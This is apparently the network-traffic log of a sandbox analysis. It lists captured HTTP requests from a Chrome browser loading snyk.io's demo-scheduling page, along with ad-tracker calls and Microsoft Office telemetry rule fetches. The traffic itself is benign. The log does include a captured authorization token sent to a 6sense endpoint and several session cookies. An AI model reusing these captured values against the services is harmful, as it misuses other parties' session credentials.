Source: global trafficHTTP traffic detected: GET /_next/static/chunks/239.0fd23c525c8d868d.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_vercel/speed-insights/script.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_vercel/insights/script.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1712924683%2FJacob-Salassi-Snowflake.png&w=96&q=75 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1025.fe1631a539c940ac.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1686142464%2Fillustration-ui-spot-snyk-deepcode-hybrid-accuracy.png&w=960&q=75 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7724.1319f18641c3767a.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6316.a120450673078999.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6923.fd4c79cfe6f39e9e.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/schedule-a-demo-8853bcd3c47033e5.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"426rz30xfxidf"
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_vercel/insights/view HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2135-5b964b3926facfba.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5B...slug%5D-06f8921baae0411a.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/239.0fd23c525c8d868d.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1712924683%2FJacob-Salassi-Snowflake.png&w=96&q=75 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1025.fe1631a539c940ac.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"coaszi6dyw1itu"
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"426rz30xfxidf"
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7724.1319f18641c3767a.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6923.fd4c79cfe6f39e9e.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6316.a120450673078999.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/schedule-a-demo-8853bcd3c47033e5.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /getuidj HTTP/1.1Host: secure.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/company/details HTTP/1.1Host: eps.6sc.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-6s-CustomID: WebTag 22d7a014-b92d-4a73-ad20-7aebe461d6e2sec-ch-ua-mobile: ?0Authorization: Token d1c26e37d31beca9d3895cf47f60178e5fae9d81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ruleSet/FLMnthfCCTbMOO.json HTTP/1.1Host: api.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonAccept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /js/forms2/js/forms2.min.js HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0If-None-Match: W/"426rz30xfxidf"
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0If-None-Match: W/"coaszi6dyw1itu"
Source: global trafficHTTP traffic detected: GET /getuidj HTTP/1.1Host: secure.adnxs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rs/677-THP-415/images/teknkl-formsplus-emailpattern-1.0.3.js?version=0 HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v3/company/details HTTP/1.1Host: eps.6sc.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /settings/Zz23KCbJ4/latest/languages.json HTTP/1.1Host: api.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonAccept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rs/677-THP-415/images/businessemaildomainonly.js?version=1 HTTP/1.1Host: go.snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ruleSet/FLMnthfCCTbMOO.json HTTP/1.1Host: api.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_vercel/insights/view HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0
Source: global trafficHTTP traffic detected: GET /rs/677-THP-415/images/teknkl-formsplus-emailpattern-1.0.3.js?version=0 HTTP/1.1Host: go.snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; RSMKTO1=1845500844.47617.0000; __cf_bm=aj9donfs43ezIlCVH2s995xJLCCUmZ4DQ8FwYK4qVEM-1729799371-1.0.1.1-I2BAPJGczsqnT7GeMK9y8By3fA00jt9yLtXlEzZBnfbgEPwhu3ehGSuWeM09.ulE.bSQpHXNuu0tLKjGweVnAw
